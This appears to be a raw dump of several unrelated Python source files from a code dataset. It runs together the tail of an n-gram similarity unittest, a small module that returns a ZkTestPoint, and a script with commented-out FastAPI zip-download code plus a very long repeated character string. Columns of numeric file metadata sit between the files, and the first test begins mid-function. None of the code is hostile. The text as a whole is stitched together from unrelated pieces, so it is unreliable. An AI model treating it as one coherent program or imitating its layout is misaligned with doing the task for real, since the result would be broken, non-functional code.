score = weighted_similarity(hyp, trg, bidirectional, split_method)
self.assertEqual(score == 0, True)
def test_ngrams_weighted_similarity(self):
'''Tests ngrams weighted similarity method'''
# Params
trg = "Batata quente"
hyp = "Batata frita"
for split_method in ['split', 'tokenize']:
for bidirectional in [True, False]:
score = ngrams_weighted_similarity(trg, hyp, bidirectional, split_method, 3)
self.assertEqual(score > 0. and score < 1., True)
score = ngrams_weighted_similarity(hyp, trg, bidirectional, split_method, 3)
self.assertEqual(score > 0. and score < 1., True)
# Params
trg = "Batata frita"
hyp = "Batata frita"
for split_method in ['split', 'tokenize']:
for bidirectional in [True, False]:
score = ngrams_weighted_similarity(trg, hyp, bidirectional, split_method, 3)
self.assertEqual(score == 1.0, True)
score = ngrams_weighted_similarity(hyp, trg, bidirectional, split_method, 3)
self.assertEqual(score == 1.0, True)
# Params
trg = ""
hyp = "Batata frita"
for split_method in ['split', 'tokenize']:
for bidirectional in [True, False]:
score = ngrams_weighted_similarity(trg, hyp, bidirectional, split_method, 3)
self.assertEqual(score == 0, True)
score = ngrams_weighted_similarity(hyp, trg, bidirectional, split_method, 3)
self.assertEqual(score == 0, True)
| 38.505747
| 92
| 0.597313
| 356
| 3,350
| 5.488764
| 0.148876
| 0.165814
| 0.14739
| 0.085977
| 0.811668
| 0.811668
| 0.77175
| 0.77175
| 0.769703
| 0.767144
| 0
| 0.012017
| 0.304478
| 3,350
| 87
| 93
| 38.505747
| 0.826609
| 0.08597
| 0
| 0.836364
| 0
| 0
| 0.06783
| 0
| 0
| 0
| 0
| 0
| 0.218182
| 1
| 0.054545
| false
| 0.018182
| 0.036364
| 0
| 0.109091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c2f571eb999b1d51c38dcc92450cb20fa5be4eff
| 199
|
py
|
Python
|
tp/zk/__init__.py
|
chinapnr/agbot
|
9739ce1c2198e50111629db2d1de785edd06876e
|
[
"MIT"
] | 2
|
2018-06-23T06:48:46.000Z
|
2018-06-23T10:11:50.000Z
|
tp/zk/__init__.py
|
chinapnr/agbot
|
9739ce1c2198e50111629db2d1de785edd06876e
|
[
"MIT"
] | 5
|
2020-01-03T09:33:02.000Z
|
2021-06-02T00:49:52.000Z
|
tp/zk/__init__.py
|
chinapnr/agbot
|
9739ce1c2198e50111629db2d1de785edd06876e
|
[
"MIT"
] | 1
|
2021-07-07T07:17:27.000Z
|
2021-07-07T07:17:27.000Z
|
from agbot.core.model.context import VerticalContext
from .tp_zk import ZkTestPoint
def run(tp_conf_dict, vertical_context: VerticalContext):
return ZkTestPoint(tp_conf_dict, vertical_context)
| 28.428571
| 57
| 0.834171
| 27
| 199
| 5.888889
| 0.592593
| 0.075472
| 0.125786
| 0.226415
| 0.314465
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105528
| 199
| 6
| 58
| 33.166667
| 0.893258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c2f630b266ac74395e7525c2d1c721a5fafb6a5a
| 32,647
|
py
|
Python
|
main_algorihm.py
|
JaremyShort/PythonNote
|
20c0822b857633e3d1c7fb8498f750fcf8d07937
|
[
"MIT"
] | null | null | null |
main_algorihm.py
|
JaremyShort/PythonNote
|
20c0822b857633e3d1c7fb8498f750fcf8d07937
|
[
"MIT"
] | null | null | null |
main_algorihm.py
|
JaremyShort/PythonNote
|
20c0822b857633e3d1c7fb8498f750fcf8d07937
|
[
"MIT"
] | null | null | null |
import os
# from io import BytesIO
# from fastapi import FastAPI
# from starlette.responses import StreamingResponse
from datetime import datetime
# app = FastAPI()
# @app.get("/result")
# async def get_zip() -> StreamingResponse:
# if os.path.exists("C:\\Users\\yinh\\Desktop\\GZHB.zip"):
# output = open("C:\\Users\\yinh\\Desktop\\GZHB.zip", mode="rb")
# # output.seek(0)
# # f = BytesIO()
# # f.write(output)
# headers = {"Content-Disposition": 'attachment; filename="GZHB.zip"'}
# return StreamingResponse(output, headers=headers)
# return None
# if __name__ == "__main__":
# import uvicorn
# uvicorn.run(app, host="127.0.0.1", port=8000)
# from algorithm.List import twoSum
# from algorithm.SingleListNode import test
# from algorithm.string_distinct_max_len import lengthOfLongestSubstring
# print(
# lengthOfLongestSubstring(
# """abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ 